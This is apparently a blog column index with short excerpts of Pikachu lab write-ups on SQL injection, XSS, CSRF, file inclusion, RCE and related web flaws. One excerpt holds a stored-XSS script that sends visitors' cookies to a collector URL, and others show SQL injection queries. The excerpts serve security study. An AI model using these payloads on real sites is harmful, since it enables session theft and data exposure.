pikachu
文章平均质量分 71
玉米同学
新手请指教。
展开
-
pikachu--- file include
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了:include(),include_once()require(),require_once()这些文件包含函数,这些函数在代码设计中被经常使用到。大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有...原创 2021-06-16 17:20:18 · 302 阅读 · 2 评论 -
pikachu~~~搜索型,xx型注入
先输入字符'试探一下原创 2021-05-31 11:25:51 · 307 阅读 · 0 评论 -
pikachu~~~insert/update/delete,http头注入
@[TOC]select TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='pikachu'select TABLE_NAME, COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME='users'select username,password from users#UPDATEXML (XML_document, XPa.原创 2021-05-30 23:56:37 · 829 阅读 · 1 评论 -
pikachu~~~数字型&字符型注入
让我们选择1-6的数字,并不能手动输入选一个抓包order by 判断有几列,发现没有第三列,那么查询语句只用了两个列名。在后面加上 or 1=1,这样判断条件变成了永真,返回所有查询结果。使用 union select database(),user() 爆破当前的数据名和当前的用户union select TABLE_SCHEMA,table_name from information_schema.tableswhere table_schema=‘pikachu’ 根据数据库名查询数据原创 2021-05-17 17:33:08 · 493 阅读 · 4 评论 -
pikachu~~~验证码绕过(on client & on server)
index基于服务端的验证码绕过(On service)基于客户端的验证码绕过(On client)【客户端可能存在的安全问题】【服务端可能存在的安全问题】我们要来思考一下,什么是验证码绕过?首先,我们在哪里会经常使用到验证码?对咯,在各web网页以及APP的登陆界面,会让我们输入:用户名,密码,验证码这三项。那绕过?怎么绕过呢?那比如说,你在软件园,去B8上课,走着走着,哎?这个平时走的路被围上了,在修路,这儿走不了了,你一定要直着走过去吗?那修路的大爷估计就要抽你了。那你咋办?你一看旁边原创 2020-12-28 14:42:47 · 2307 阅读 · 1 评论 -
pikachu~~~布尔,时间,宽字节盲注
基于boolian的盲注屏蔽了报错信息,只显示两种情况:正确和错误输入单引号试探f原创 2021-06-03 22:06:16 · 1317 阅读 · 2 评论 -
Sqlmap使用-盲注小实验
sqlmap简介sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。...原创 2021-06-03 23:56:11 · 6580 阅读 · 2 评论 -
pikachu~~~CSRF(get,post,token)
GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=dv&phonenum=num&add=beijing&email=kobe%40pikachu.com&submit=submit HTTP/1.1原创 2021-06-06 00:28:48 · 1705 阅读 · 8 评论 -
存储型XSS清除方法
今天也是被自己气哭的一天今天做XSS盗取cookie实验<script>document.location='http://192.168.241.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>就是用这个罪恶的p原创 2021-06-06 12:20:33 · 2145 阅读 · 4 评论 -
pikachu~~~XSS
反射型xss(get)先输入'"<>$223探测特殊字符是否被过滤原创 2021-06-06 13:48:36 · 351 阅读 · 0 评论 -
XSS和CSRF总结
学完xss和csrf之后,感觉二者极其容易混淆,所以这里做一个总结和区分。网上看了一些解释发现五花八门,看的我云里雾里了,最后看了官方文档才xue'ming'b原创 2021-06-06 14:07:01 · 335 阅读 · 3 评论 -
pikachu~~~ over permission越权
如果使用A用户的权限去操作B用户的数据,A的权限小于dengyuB的权限,如果能够成功操作,则称之为越权操作。 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方,当用户对权限页面内的信息进行这些操作时,后台需要对 对当前用户的权限进行校验,看其是否具备操作的权限,从而给出响应,而如果校验的规则过于简单则容易出现越权漏洞。因此,在在权限管理中应该遵守:1.使用最小权限原则对用户进行赋权;2.使用合理(严格)的权...原创 2021-06-06 17:10:19 · 331 阅读 · 2 评论 -
pikachu~~~RCE
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而...原创 2021-06-06 17:26:15 · 407 阅读 · 3 评论 -
pikachu~~~PHP反序列化
序列化serialize()序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";} O:代表object 1:代表对象名字长度原创 2021-06-06 18:13:51 · 148 阅读 · 1 评论